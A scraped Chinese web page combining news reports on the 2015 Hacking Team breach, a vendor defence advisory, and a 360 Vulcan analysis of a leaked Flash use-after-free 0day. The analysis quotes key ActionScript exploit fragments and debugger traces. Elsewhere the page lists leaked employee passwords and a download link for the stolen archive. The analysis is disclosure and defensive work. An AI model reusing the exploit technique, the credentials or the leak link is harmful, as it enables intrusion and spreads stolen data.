专业黑客公司Hacking Team被黑，泄露大量内部资料
Hacking Team是一家以协助政府监视公民而闻名于世的意大利公司，他们向包括摩洛哥、埃塞俄比亚以及美国毒品管制局在内的政府及执法机构出售入侵和监视工具。而这两天他们居然被黑
Hacking Team是一家以协助政府监视公民而&闻名于世&的意大利公司，他们向包括摩洛哥、埃塞俄比亚以及美国毒品管制局在内的政府及执法机构出售入侵和监视工具。而这两天他们居然被黑了！
&Hacking Team&反被&Hacked&
作为一家专业从事监视技术的黑客团队及公司，Hacking Team（以下简称HT）今天亲身体验了内部数据被公之于众的感受。
因为HT的商业行为以及他们为政府开发的媒体监控工具达芬奇（Da Vinci），无国界记者组织（Reporters Without Borders）将HT列为&网络敌人索引&（Enemies of the Internet index），
目前尚不清楚是什么组织攻击了HT，然而袭击者对公众发布了多达400GB的（含有客户端文件、合同、财务等）内部文件、源代码以及电子邮件，可供下载。
此外，攻击者黑掉了Hacking Team的Twitter账户，丑化了logo、简介以及将黑客获得的内部消息通过被害者HT 的Twitter发布于众。
事件进展（更新）
& Christopher Soghoian表示，从公布的文件来看，HT的客户主要有韩国、哈萨克斯坦、沙特阿拉伯、阿曼、黎巴嫩和蒙古。然而，该公司坚称他们不与专制政府做生意。
& 研究人员已经开始从曝光的文件中寻找交易商品信息。其中一个项目发票显示为58000欧元，对象是埃及，用于HT的RCS exp通道（RCS Exploit Portal）。
& Motherboard曾揭露美国毒品管制局（DEA）以240万美元的价格秘密从HT购买间谍软件。
& 泄密发票显示了埃塞俄比亚曾支付1000万比尔（埃塞俄比亚货币）用于远程控制系统、专业服务及通讯设备交易。
& HT曾表示，&打算在你的政府级监控软件中运用一些Oday漏洞利用攻击吗？那么每年再加50000。&
& 有记者通过Twitter直接消息与攻击HT的黑客取得联系，询问他们是否可以发表评论。黑客（们）最初的反映是：&当然好。&
& 有许多安全研究人员和人权活动家认为此次攻击充满讽刺：
Christopher Soghoian：有史以来最棒的透明度报告，@Hacking Team
HT竞争对手Finfisher
几乎在一年之前，另一家科技监控公司Finfisher遭遇了同样方式的黑客入侵，泄露400GB的内部文件。
与HT相同，Finfisher向世界各地执法机构出售监控软件。他们的软件一旦被偷偷安装在目标手机或者电脑后，便可以用来监视目标，如电话、短信、Skype或邮件。运营商还可以打开目标的网络摄像头并从设备中提取文件。
从今天泄露的一封内部电子邮件显示，HT当时对于Finfisher的遇袭表示好不得意，&一个想要成为我们的竞争对手已经被严重攻击了&。
客户坐标大曝光
周日晚攻击者泄露的内部文件显示，HT客户存在于以下一些地点：
埃及、埃塞俄比亚、摩洛哥、尼日利亚、苏丹&&&&
智利、哥伦比亚、厄瓜多尔、洪都拉斯、墨西哥、巴拿马、美国
阿塞拜疆、哈萨克斯坦、马来西亚、蒙古、新加坡、韩国、泰国
乌兹别克斯坦、越南、澳大利亚、塞浦路斯、捷克、德国、匈牙利
意大利、卢森堡、波兰、俄罗斯、西班牙、瑞士、巴林、阿曼
沙特阿拉伯、阿联酋
HT发言人Eric Rabe并没有立即回复记者的电话及邮件询问被泄露的信息是否合法。
一个黑客项目价值约40万
在分享的种子中，邮件是最大的，将近200G：
据说种子内的一个项目值5.8万欧元，换算过来具体多少呢？容小编算算：
Hacking Team泄密资料
链接：/s/1pJvEQMZ 密码：df3e
最后，让我们看看这款臭名昭著的黑客工具&&&达芬奇&的简介吧，挺炫的！
400GB的猛料曝出，相信会有源源不断地&好资讯&向我们迎面扑来。黑吧安全网将继续跟踪事件的进展及时更新&&
(责任编辑：admin)
------分隔线----------------------------
自从iPhone 5s开启指纹识别功能后，安卓智能机纷纷效仿，各大手...
昨从武汉警方获悉，监测显示这一时期容易出现仿冒高校或招考...
随着互联网金融的不断发展，对网络程序的依赖越发严重。但对...
近日，数据分析公司G DATA New data的一份报告让安卓用户烦恼不已...
虽然怀揣民族主义的红客们已经退出历史舞台，但中美黑客之间...
专门开发间谍软件的意大利公司Hacking Team(入侵团队)遭到黑客入...站长QQ：&&& 您有好的网站发展建议或想加入我们可以联系此QQ
编程技术QQ群：VC/MFC： C#开发： VB/VB.net：
防护方案Hacking Team数据泄露事件
磐实编程网在7月10日又接到了绿盟科技发来的计算机安全相关的原创文章，以下原文内容
7月5日晚，一家意大利远程控制软件厂商Hacking Team的内部数据被泄露出来，其影响力不亚于斯洛登事件及维基解密事件，绿盟科技威胁响应中心随即启动应急响应工作。
1& &&& 6日，威胁响应中心启动应急分析工作，绿盟TAC产品拦截到Flash 0Day漏洞攻击；
2& &&& 6日夜，相关信息及初步建议，第一时间告知客户关注；
3& &&& 7日，在官网网站发布紧急通告，建议广大用户关注事件进展。分析工作进展进展中；
4& &&& 9日，发布Hacking Team远程控制系统简要分析报告，同时发布防护方案；
本报告从此次事件中获取的样本入手，分析其包含的数据及影响，为用户思考下一步的应对方案，给出了防护思路及解决方案。
攻击：谁在攻击？
7月5日晚，一家意大利软件厂商 被攻击，其掌握的400GB数据泄露出来，由此可能引发的动荡，引起了业界一片哗然。截止发稿时止，有多个组织声称对此行为负责，包括Gamma Group Hacker 。虽然目前没有事实表明该声称确实可信，但由此让黑色产业链条中的一种&新&形态暴露出来，即从攻击最终用户演变为攻击中间链条乃至攻击者组织之间的互相厮杀，这种形态已经从黑产上升到供应商、政府机构之间的问题，这不得不说，对涉及中间链条的组织，敲响了警钟。
Hacking Team及Gamma Group
Hacking Team在意大利米兰注册了一家软件公司，主要向各国政府及法律机构销售入侵及监视功能的软件。其远程控制系统可以监测互联网用户的通讯、解密用户的加密文件及电子邮件，记录Skype及其他VoIP通信，也可以远程激活用户的麦克风及摄像头。其总部在意大利，雇员40多人，并在安纳波利斯和新加坡拥有分支机构，其产品在几十个国家使用
无独有偶，这次声称对此次事件负责的组织，Gamma Group International 也曾经在2014年的8月被人入侵过，在那次的事件中，该组织被泄露了40GB的内部文档和恶意程序代码。这个组织无论从背景还是业务都与Hacking Team类似，但是一家英国的公司。
&地下产业链各方的相互厮杀由此可见一斑，这里简单用一张图来简单展示一下其中的一个部分。值得关注的是，这次通过攻击供应商等中间链条获得攻击数据的动态。
此次事件中泄露的数据多达400GB，数据包中主要包含几个大的部分：
&远程控制软件源码，也是其核心，暂且称之为 Hacking Team RCS（Remote Control System）
&反查杀分析工具及相关讨论文档
&0Day、漏洞及相关入侵工具
&入侵项目相关信息，包括账户密码、数据及音像资料
&办公文档、邮件及图片
在这些数据中，绿色标注的3类比较引人关注，这3类数据将对各个不同的领域造成影响
&更频繁：0Day、漏洞及相关入侵工具，从目前获取的信息来看
&Flash 相关的应用及软件使用量非常庞大，Windows平台上几乎是所有的用户都会用到；
&这些漏洞的流入黑色产业链，会让攻击更加快速和复杂化
&门槛低：Hacking Team RCS，是该组织主要输出的软件，从目前获取的信息来看
&可以获取目标用户的电话、电脑的全部信息及影音资料；
&涉及的桌面OS从Windows到MacOs X，手机OS基本覆盖了市场上流行的系统；
&受该工具及其已经感染的客户端数量的影响，会让攻击门槛降低
&影响大：入侵项目相关信息，这里面包含了各种入侵过程资料，甚至包含了已经成功获取的账户密码及相关资料，一旦被恶意攻击者获取并利用，将会在黑色产业链中进一步发酵。
威胁响应中心在长年对黑客组织事件的追踪及分析中，获得了丰富的经验积累，借鉴及建立了一些模型去理解它们，试图从中找到规律，以便为应对未来的未知威胁提供经验借鉴。针对此次事件，这里使用Intrusion Kill Chain模型跟大家进行探讨，虽然不一定适合所有业务环境，但希望可以帮助大家找到指定自身防护方案的一点灵感。
Intrusion Kill Chain模型精髓在于明确提出网络攻防过程中攻防双方互有优势，防守方若能阻断/瓦解攻击方的进攻组织环节，即是成功地挫败对手的攻击企图。模型是将攻击者的攻击过程分解为如下七个步骤: Reconnaissance（踩点）、Weaponization（组装）、Delivery（投送）、Exploitation（攻击）、Installation（植入）、C2（控制）、Actions on Objectives（收割），如下图：
在这个阶段，建议您将当前IT环境中的漏洞扫描系统升级到最新版本后，尽快开始对业务系统进行扫描，尤其是受此次Flash 0Day漏洞影响的业务系统平台进行一次完整的漏洞扫描。
此次事件中，绿盟威胁分析系统（NSFOCUS Threat Analyze Center，TAC）即体现出优越性，即通过独创的静态检测和动态检测引擎，能够不依赖于攻击特征识别恶意软件及其危害程度，率先侦测到Flash 0Day漏洞。
绿盟TAC可有效检测通过网页、电子邮件或其他在线文件共享方式进入网络的已知和未知恶意软件，发现利用0day漏洞的APT攻击行为，保护客户网络免遭利用0day漏洞等攻击造成的各种风险，如敏感信息泄露、基础设施破坏等。
绿盟TAC能够在如下两个阶段对此次事件所带来的可能攻击进行检测
&Delivery阶段：发现（detect）试图传输到内网的恶意软件（文件），包括已知和未知的高级恶意软件；
&Installation阶段：发现高级恶意软件成功利用后，试图从控制端下载更多恶意程序。
如果您已经部署了绿盟网络入侵防护系统（Network Intrusion Prevention System，简称NIPS），在升级最新的升级包后，即可阻断Flash 0Day漏洞所带来的攻击，并持续获得敏感数据保护、客户端防护、服务器非法外联防护、僵尸网络防护等多项防护。
0Day漏洞一旦被公开，往往也是被攻击者利用最为猖狂的时候。在此, 安全专家建议:
&安装反病毒软件进行全盘查杀, 并第一时间更新系统和Flash补丁
&推荐使用安全级别更高的猎豹, FireFox浏览器
&Chrome用户请升级至最新版本(&=43)
&IE, Chrome用户请手动升级Flash至最新版本
&养成良好的上网习惯和安全意识,
&提高内部员工的安全意识和建立完备的监控体系是防范APT的重要手段。
&建议对内部员工开展广泛的安全意识培训，避免出现使用弱口令、点击不明来历邮件附件、访问恶意网站等危险行为。不随意打开陌生人通过QQ等发送的网页链接, 不随意打开垃圾邮件
绿盟下一代威胁解决方案（NGTP解决解决方案），是针对APT威胁进行检测和防御的解决方案。NGTP解决方案聚焦APT攻击链条，检测和防御APT攻击链中攻击，潜伏和盗取三个主要环节。重点检测和防御在攻击尝试阶段，进入后的潜伏和扩展攻击阶段，以及最终盗取数据目的阶段。
NGTP解决方案以全球威胁情报云为纽带，以未知威胁检测为核心，通过与传统终端、网关设备联动，实现跨厂商的威胁情报的共享，以及企业威胁态势可视化，最终达到提升企业APT威胁防护的能力的目标。
NGTP针对0Day漏洞攻击的解决方案，由本地沙箱TAC，威胁防御模块IPS，绿盟安全信誉和ESPC管理等系统构成。NGTP方案防御0Day漏洞攻击的流程：
&第一步：要经过本地沙箱系统TAC的检测，TAC提供静态检测引擎和虚拟执行引擎，对恶意软件进行Shellcode静态分析，然后再进行虚拟执行。通过这两步分析，从Hacking Team组织泄露的0Day攻击软件被识别出来；
&第二步：TAC检测出恶意软件的来源，生成信誉信息，包括文件的信誉和攻击源IP等信息，同步到本地的安全管理中心ESPC，形成本地的信誉库；
&第三步：NIPS从本地信誉库接收到恶意软件的信誉信息，对发起攻击的源IP实现阻断，并生成告警日志。
&APT威胁检测和防御的全面性&&&&&&&&&&& 绿盟下一代威胁解决方案，能够全面的对APT威胁检测和防御。无论是网络，Web还是邮件，终端众多通道，都是APT威胁可能利用的通道，NGTP解决方案，不仅在网络边界进检测和防御，还在企业内网，邮件服务器，终端等多个层面进行检测和防御。既能够实时进行检测和阻断，还利用大数据分析平台，进行事后的分析和调查。
&APT检测的准确性&&&&&&&&&&&&&&&&&&&&& 绿盟下一代威胁解决方案，利用本地沙箱和云端安全信誉，准确地对APT威胁检测和防御。本地沙箱提供了恶意软件静态检测和虚拟执行手段，检查恶意软件Shellcode，并且模拟真实的PC环境进行验证，极大提高恶意软件的准确性；同时，云端信誉提供最新的威胁情报信息，进一步提供NGTP方案对APT威胁检测的准确性。
&解决方案技术领先&&&&&&&&&&&&&&&&&&&&& 组成NGTP解决方案的各个模块技术先进。TAC产品，是国内最早推向市场的APT检测设备，经过几年的不断优化，功能和性能得到极大提高，尤其是获得专利技术的静态Shellcode检测技术和虚拟执行检测技术，更是为APT威胁检测的准确性提供强力支撑。绿盟NIPS产品也是久负盛誉，不仅在国内市场上遥遥领先，还多次于国际权威检测机构得到认可。绿盟安全威胁信誉系统，提供最新最全的安全信誉，让NGTP方案发挥最大效能。
从目前此次攻击及各方面应对情况来看，对于一些高级攻击形式，关键在于尽可能快的了解到相关的情报，以便尽可能快的启动应急响应机制。这无论对于解决木马或者APT攻击来说都是重要的手段之一，威胁情报的获取及响应都体现了防御能力的建设程度，威胁情报服务体系至少包含了威胁监测及响应、数据分析及整理、业务情报及交付、风险评估及咨询、安全托管及应用等各个方面，涉及研究、产品、服务、运营及营销的各个环节，绿盟科技通过研究、云端、产品、服务等立体的应急响应体系，向企业和组织及时提供威胁情报，并持续对对匿名者攻击事件进行关注，保障客户业务的顺畅运行。
感谢 绿盟科技 支持 磐实编程网 原文地址：绿盟科技
发布时间：
作者：绿盟科技 发布者：aquwcw
浏览次数：只需一步，快速开始
只需一步，快速搞定
后使用快捷导航没有帐号？
Hacking Team被黑后续：攻击者浮出水面
|关注黑客与极客
摘要: 微信号：freebuf据FreeBuf报道，恶名昭著的间谍软件公司Hacking Team被黑客攻击，造成内部多达400GB的数据外泄。事件曝出后，Hacking Team建议在世界各地的执法及政府客户停止使用他们的软件并宣布与FBI合作（此前FB ...
号：freebuf据FreeBuf报道，恶名昭著的间谍软件公司Hacking Team被黑客攻击，造成内部多达400GB的数据外泄。事件曝出后，Hacking Team建议在世界各地的执法及政府客户停止使用他们的软件并宣布与FBI合作（此前FBI是他们的客户），调查此次攻击事件，将元凶绳之以法。HT：千呼万唤始出来现在，Hacking Team宣布与警方合作展开调查，并建议客户停用软件以免受损害。同时，他们呼吁：“不要相信你们看到的一切，攻击者所声称的大多数都不是真的......攻击者在散布大量的谎言，而且400G文件中还包含病毒......”线人消息，周一HT用了“爆炸邮件”通知所有客户，要求他们关闭所有部署的远程控制系统软件，也就是为人知晓的远程控制类恶意软件“伽利略”（Galileo）。截至周一下午，HT都未能登录自己的电子邮件系统。黑客：没错，去年是我黑的FinFisher一名只知道名为“Phineas Fisher”的黑客2014年攻击了因向专制政府出售监视产品而颇受争议的科技监控公司Finfisher，该公司向世界各地执法机构出售监控软件。在攻击之后，黑客泄露出超过40GB的公司内部数据。同一名黑客声称对此次HT被黑事件负责。记者与其交流记录如下：“周日晚上，黑客正在控制HT的Twitter帐号时，我通过推特短消息与他取得了联系。最初，PhineasFisher充满讽刺地回复，‘我当然愿意和你聊聊，因为这对你的上一篇报道是个多么好的宣传啊！’他指的是最近我写了一篇关于HT公司CEO放言能够帮助FBI破解暗网。”然而，这名黑客拒绝进一步回答任何问题。HT数据泄露“经验”总结：弱密码、自家产品加后门1、密码不能随便设攻击者通过入侵Hacking Team的两个系统管理员的计算机得以访问公司的内部网络。黑客成功获取了其一名在LinkedIn上自称是HT公司安全工程师Pozzi的 FireFox浏览器储存的密码，发现了一系列相当low的登录凭证，注意这里并不是大多数安全专家建议的那种复杂、难破解并且独特的密码。泄露出来的工程师名单及其密码实在令人印象深刻：HTPassw0rdPassw0rd!81Passw0rdPassw0rd!Pas$w0rdRite1.!!有人发现HT的MySQL密码竟然是Ht2015！一位安全专家表示，Hacking Team被黑并不令人意外，“因为他们没把安全当回事”，只是“没想到后果会如此严重，你可以从泄露出的文件中看出，他们的麻烦大了。”2、后门不能随便开细心推友发现，HT在自家产品中安置后门，方便自己执行任意SQL注入。要知道，HT的客户都是那些“不能说的秘密”，虽然现在已经曝光光了，但是后门这种事也实在是不好吧。3、生意不能随便做泄密事件爆发后，大家的注意力似乎都没有放在美国FBI、毒品管制局（DEA）这样的大客户上。而是聚焦于HT与一些实施了暴力压制的政府交易，其中包括埃及、黎巴嫩、埃塞俄比亚和苏丹。其中苏丹最为惹眼，因为联合国对苏丹是由武器禁运的，这个禁运令涵盖了欧盟和英国法律。HT之前一直否认与苏丹有业务关系，如果此事证明属实，Hacking Team的麻烦就大了。也有网友从邮件中找出HT回应联合国的说辞：我们的产品并不是武器，因此不受禁令的制约。从此次大规模泄密事件引发的血案来看，HT以后再也没有理由否认自己就是大规模杀伤性武器的事实了。福利时间话说赌场失意，情场得意。这两天股市的话题是不能继续聊了，那就寄情于HT发放的415GB大礼包！有大神总结的HT泄漏精华，不光有flash的exp，所有系统的exp和tools都有，还有415G完整在线镜像。&更多链接请点击文尾阅读原文&Phineas Fisher黑客指南攻击者Phineas Fisher表示，之后会写一下自己是如何黑了HT。而HT他们也需要一些时间来搞清楚究竟发生了什么事，并处理一下破产事宜。Fisher之前的所写的堪称“黑客指南”一文，题注是：一份DIY指南——献给那些没有耐心等待的揭秘者。详细的介绍了从信息收集，到发现目标站点，以及进行源码审计，绕过waf注入，尝试提权服务器的整个过程。*FreeBuf小编综合整理，转载需注明来自FreeBuf黑客与极客（）　
上一篇：下一篇：Hacking Team攻击代码分析Part 1：Flash 0day
最近专门提供通过攻击手法进行网络监听的公司Hacking Team被黑，包含该公司的邮件、文档和攻击代码的400G数据泄漏。360Vulcan Team第一时间获取了相关信息，并对其中的攻击代码进行了分析。
我们发现其中至少包含了两个针对Adobe Flash的远程代码执行和一个针对微软Windows内核字体权限提升漏洞的完整攻击代码（exploit）。其中一个Flash漏洞已经在今年4月修补，其他两个漏洞都未修复。
其中Flash漏洞exploit被设计为可以针对IE、Chrome和Office软件进行攻击。攻击者通过嵌入精心构造的恶意Flash文件到网页或Office文档中，使得访问特定网页或打开Office文档的用户感染恶意代码。同时，这些恶意代码通过结合Windows内核字体权限提升漏洞，可以绕过IE（保护模式或增强保护模式）、Chrome（Chrome Sandbox，& Chrome 43)和Office（保护模式）的沙盒保护，完全控制用户的电脑。
360Vulcan Team对这些漏洞进行分析，并分为三个部分将这些0day的信息共享给安全社区，希望软件厂商和安全厂商共同行动，尽快修补和防御着这些&在野&的0day漏洞。
Flash 0day -ActionScript ByteArray Buffer Use After Free
看起来HackingTeam的远程exploit工具中广泛使用了同一个flash漏洞（攻击目标可以是IE、Chrome、Office系列）:
初步分析这个Exploit之后，我们发现这个Exploit在最新版本的Adobe Flash（18.0.0.194）中仍然可以触发，因此这应该是一个0day漏洞。
漏洞原理分析
这个漏洞成因在于，Flash对ByteArray内部的buffer使用不当，而造成Use After Free漏洞。
我们来看一下HackingTeam泄露的exploit代码，关键部分如下：
1.& 定义ByteArray
for(var&i:&i&&&&i+=3){
&&&&&&&&&&&&&&&&&a[i]&=&new&Class2(i);
&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&a[i+1]&=&new&ByteArray();
&&&&&&&&&&&&&&&&&a[i+1].length&=&0xfa0;
&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&a[i+2]&=&new&Class2(i+2);
&&&&&&&&&&&&&}
首先定义一系列的ByteArray，这些ByteArray初始大小被设置成0xfa0，ActionScript内部会为每个Buffer分配0&1000大小的内存。
1.& 给ByteArray元素赋值：
_ba&=&a[i];
&&&&&&&&&&&&&&&&&//&call&valueOf()&and&cause&UaF&memory&corruption
&&&&&&&&&&&&&&&&&_ba[3]&=&new&Clasz();
这一步是触发漏洞的关键，由于ByteArray的元素类型是Byte，当把Clasz类赋值给ByteArray[3]时，AVM会试图将其转化为Byte，此时Clasz的valueOf函数将被调用：
prototype.valueOf&=&function()
&&&&&&&&&ref&=&new&Array(5);
&&&&&&&&&collect.push(ref);
&&&&&&&&&//&realloc
&&&&&&&&&_ba.length&=&0x1100;
&&&&&&&&&//&use&after&free
&&&&&&&&&for&(var&i:&i&&&ref.&i++)
&&&&&&&&&&&&&ref[i]&=&new&Vector.(0x3f0);
&&&&&&&&&return&0x40
在valueOf函数中，最关键的一部是更改了ByteArray的长度，将其设置成为0&1100，这个操作将会触发ByteArray内部buffer的重新分配，旧的buffer（大小为0&1000）将会被释放。紧接着exploit代码会分配若干个vector对象，每个vector同样占用0&1000字节的内存，试图去重新使用已经释放的ByteArray buffer的内存。
valueOf函数返回0&40，然后0&40会被写入buffer[3]这里，如果逻辑正确，那么此处应该写入的是新分配的buffer；然而由于代码漏洞，这里写入的已经释放的0&1000大小的旧buffer，于是事实上写入的是vector对象的头部，整个过程如下：
1.& ByteArray创建并设置长度0xfe0:
old&buffer&&|&&&&&&&&&&&&&&&&&&&&&&&|
0&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&0x1000
2.&&设置_ba[3]，调用valueOf，在valueOf中设置ByteArray.length&=&0x1100，此时old&buffer被释放
old&buffer&(Freed)&&|&&&&&&&&&&&&&&&&&&&&&&&|
0&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&0x1000
3.&&然后0x1000大小的vector占据old&buffer内存，前4个字节是vector的长度字段：
Vector&&&&&&&&&&|&f0&03&00&00&&&&&&&&&&&&&&&|
0&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&0x1000
4.&&valueOf返回0x40，0x40被写入buffer[3]，由于UAF漏洞的存在，写入的是vector的size字段：
Vector&&&&&&&&&&|&f0&03&00&40&&&&&&&&&&&&&&&|
0&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&0x1000
于是我们可以得到一个超长的vector对象：
我们可以通过调试来观察漏洞的触发过程：
1.& 调用valueOf之前
671cf2a5&&&call&&&&&671b0930&//这里最终调用valueOf
671cf2aa&83c404&&&&&&&&&&add&&&&&esp,4
671cf2ad&8806&&&&&&&&&&&&mov&&&&&byte&ptr&[esi],al
671cf2af&5e&&&&&&&&&&&&&&pop&&&&&esi
此时esi指向old buffer:
0:005&&dd&esi-3
2.& 调用valueOf之后，old buffer被释放，然后被vector占据：
671cf2aa&83c404&&&&&&&&&&add&&&&&esp,4
此时esi已经指向新分配的vector，就buffer已经被释放
0:005&&dd&esi-3
0dfdf0&0d2b0&
3.& 写入buffer[3
接下来valueOf的返回值0x40被写入buffer[3]（及vector.size字段）：
eax=&ebx=0d8b4921&ecx=&edx=&esi=0dfd5003&edi=0d362020
eip=671cf2ad&esp=04f2ceec&ebp=04f2d050&iopl=0&&&&&&&&&nv&up&ei&pl&nz&na&po&nc
cs=001b&&ss=0023&&ds=0023&&es=0023&&fs=003b&&gs=0000&&&&&&&&&&&&&efl=
Flash32_18_0_0_194!IAEModule_IAEKernel_UnloadModule+0x1ba07d:
671cf2ad&8806&&&&&&&&&&&&mov&&&&&byte&ptr&[esi],al&&&&&&&&&&ds:0023:0dfd5003=00
Flash32_18_0_0_194!IAEModule_IAEKernel_UnloadModule+0x1ba07f:
671cf2af&5e&&&&&&&&&&&&&&pop&&&&&esi
0:005&&dd&esi-3
0dfdf0&0d2b0&
可以看到vector的长度以及被修改成0x。
由于该漏洞利用非常稳定，而Adobe暂时没有发布该漏洞的补丁，更可怕的是从HackingTeam泄露的数据来看，该exploit还带有沙盒突破提权功能，危害甚大。我们建议补丁发布之前，可以暂时先禁用flash插件；也可以开启Chrome或Chrome核心浏览器针对插件的Click-to-Run功能，来缓解Flash 0day的攻击。
您对本文章有什么意见或着疑问吗？请到您的关注和建议是我们前行的参考和动力&&
659 | <a target="_blank" title="Traq Traq &= 2.3认证绕过/远程代码执行缺
您的浏览器不支持嵌入式框架，或者当前配置为不显示嵌入式框架。